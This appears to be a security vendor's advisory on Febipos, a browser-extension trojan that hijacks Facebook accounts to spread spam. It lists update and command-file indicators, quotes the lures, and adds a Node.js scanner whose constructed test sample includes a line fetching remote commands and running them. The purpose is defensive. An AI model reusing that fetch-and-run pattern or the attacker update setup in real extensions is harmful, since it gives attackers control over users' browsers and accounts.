We have received reports about a wave of malicious browser extensions that hijack Facebook profiles. The threat was first seen in Brazil, and we detect it as Trojan:JS/Febipos.A. It is a browser extension that specifically targets Google Chrome and Mozilla Firefox.
When installed, it attempts to update itself using the following URLs:
Chrome browser:
du-pont.info/updates/<removed>/BL-chromebrasil.crx
Mozilla Firefox browser:
du-pont.info/updates/<removed>/BL-mozillabrasil.xpi
Note: Updated versions of this threat have been verified and are still detected as Trojan:JS/Febipos.A.
Once running, the Trojan first checks whether the user is currently logged in to Facebook. It then fetches a configuration file from the website <removed>.info/sqlvarbr.php; that file lists the commands the extension will carry out.
Depending on the contents of the file, the malware can do any of the following from the Facebook profile of the infected user:
Like a page
Share
Post
Join a group
Invite friends to a group
Chat with friends
Comment on a post
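The update URLs and the configuration-file fetch above give a responder concrete strings to hunt for in an unpacked extension. The following is an added example written for this post, not code from the original write-up or from the malware: a small Node.js scanner that takes the files of an unpacked extension as text, parses the Chrome manifest for a non-Web-Store update_url and for content scripts scoped to facebook.com, and greps every file for the indicators named above (du-pont.info, sqlvarbr.php, the .crx and .xpi package names). The sample extension contents are constructed for the demonstration; the path segment the write-up redacts is left as a placeholder and not guessed.

```javascript
'use strict';

// Indicators taken from the write-up. The redacted path segment is not
// reconstructed, so only the host and file names are matched.
const INDICATORS = [
  { id: 'update-host', re: /du-pont\.info/i, note: 'self-update host' },
  { id: 'config-file', re: /sqlvarbr\.php/i, note: 'command configuration file' },
  { id: 'crx-update', re: /BL-chromebrasil\.crx/i, note: 'Chrome update package name' },
  { id: 'xpi-update', re: /BL-mozillabrasil\.xpi/i, note: 'Firefox update package name' },
];

// Scan the text of one extension file for the string indicators.
function scanFileText(name, text) {
  const hits = [];
  for (const ind of INDICATORS) {
    if (ind.re.test(text)) hits.push({ file: name, id: ind.id, note: ind.note });
  }
  return hits;
}

// Parse a Chrome manifest.json and report structural red flags: an update_url
// that does not point at the Chrome Web Store, and content scripts that are
// injected into facebook.com pages.
function scanChromeManifest(manifestText) {
  const findings = [];
  let manifest;
  try {
    manifest = JSON.parse(manifestText);
  } catch (e) {
    return [{ file: 'manifest.json', id: 'bad-manifest', note: 'manifest is not valid JSON' }];
  }
  if (typeof manifest.update_url === 'string' &&
      !/^https:\/\/clients2\.google\.com\//i.test(manifest.update_url)) {
    findings.push({ file: 'manifest.json', id: 'third-party-update',
                    note: 'update_url ' + manifest.update_url });
  }
  for (const cs of manifest.content_scripts || []) {
    for (const m of cs.matches || []) {
      if (/facebook\.com/i.test(m)) {
        findings.push({ file: 'manifest.json', id: 'facebook-content-script',
                        note: 'content script matches ' + m });
      }
    }
  }
  return findings;
}

// Scan a whole unpacked extension given as an object of {filename: text}.
function scanExtension(files) {
  let findings = [];
  for (const [name, text] of Object.entries(files)) {
    if (name === 'manifest.json') findings = findings.concat(scanChromeManifest(text));
    findings = findings.concat(scanFileText(name, text));
  }
  return findings;
}

// Constructed sample: what a Febipos-style unpacked Chrome extension could
// look like. The hostnames and file names are illustrative, not recovered
// from the malware; REMOVED stands in for the segment redacted in the post.
const SAMPLE_EXTENSION = {
  'manifest.json': JSON.stringify({
    name: 'Video Player',
    version: '1.0',
    manifest_version: 2,
    update_url: 'http://du-pont.info/updates/REMOVED/BL-chromebrasil.crx',
    content_scripts: [{ matches: ['*://*.facebook.com/*'], js: ['fb.js'] }],
  }),
  'fb.js': 'fetch("http://REMOVED.info/sqlvarbr.php").then(r => r.text()).then(run);',
};

// Constructed benign extension for comparison: Web Store update URL, no
// Facebook scope, no indicator strings.
const BENIGN_EXTENSION = {
  'manifest.json': JSON.stringify({
    name: 'Notes', version: '2.1', manifest_version: 2,
    update_url: 'https://clients2.google.com/service/update2/crx',
  }),
  'notes.js': 'document.body.textContent = "hello";',
};

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanExtension(SAMPLE_EXTENSION)) {
    console.log(f.file + ': ' + f.id + ' (' + f.note + ')');
  }
}
```

To use this against a real profile, read each file of the unpacked extension directory (Chrome keeps them under the profile's Extensions folder; a Firefox .xpi is a zip and has to be extracted first) into the {filename: text} object and pass it to scanExtension. A non-Web-Store update_url is only a weak signal on its own, since enterprise and sideloaded extensions use one legitimately, but combined with a facebook.com content script and any of the string indicators it is worth pulling the extension for analysis.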
At the time of writing, we have also observed the following behavior.
The configuration file contains a command to post the following message on Facebook:
GAROTA DE 15 ANOS VÍTIMA DE BULLYING COMETE SUICÍDIO APÓS MOSTRAR OS SEIOS NO FACEBOOK
Vídeo no link abaixo: <Currently unavailable link>
It is written in Portuguese and here’s an English translation:
15 YEAR-OLD VICTIM OF BULLYING COMMITS SUICIDE AFTER SHOWING HER BREASTS ON FACEBOOK.
Video on the link below: <Currently unavailable link>
The link is no longer available and has already been blocked by Facebook.
We also found that this threat "likes" a particular Facebook page and comments on a post from that page with one of the following messages, written in Portuguese:
Tenha um Celta 0km pagando R$13,00 por dia!!
English translation: Get a brand new Celta paying R$13 per day!!
Concurso valendo um Vale-Compras de R$1000,00!
English translation: R$1000-voucher contest!
Note: The message may vary depending on the configuration file.
On that Facebook page, a shared link had about 165 comments and 167 likes when we looked at it. It is possible that the accounts behind those comments and likes are infected with Trojan:JS/Febipos.A.
This Trojan may also send out the following messages via chat, posts or comments:
Desculpa ai galera, mas isso eh um absurdo!!!
English translation: Sorry guys, but this is ridiculous!!!
Sonzinho sensação do momento. Muito show!!
English translation: The coolest tune at the moment. It’s really nice!
Léo Max e Renan - Rebolada de Gama (Clipe Oficial)
English translation: <song title> (Official Clip)
Eu, não tenho carro do ano, não tenho grana sobrando, mas chego junto e...♫♫
English translation: I don’t have a new car, I don’t have spare cash, but I get really close...
It may also post links to Facebook profiles. For example, the link shared on the Facebook page described above redirects to a website that sells cars.
As this post was being written, more users were "liking" and "commenting" on the Facebook page the malware uses, which suggests that infections were still spreading.
The number of “likes” for this page grew as we analyzed this malware. When we began analysis the page statistics looked like this:
Facebook page likes: 2,746
Facebook shared link likes: 167
Number of comments: 165
After several hours this had risen to:
Facebook page likes: 3,177
Facebook shared link likes: 201
Number of comments: 183
All of the information above is what we found at the time of our analysis. There may be more to this threat, because the configuration file lets its operators change the messages, URLs, target Facebook pages and other activity at any time. Users who see unexpected likes, posts or comments from their own account should review the extensions installed in Chrome and Firefox and remove any they do not recognize. In any case, we recommend you always keep your security products updated with the latest definitions to help avoid infection.
Jonathan San Jose
MMPC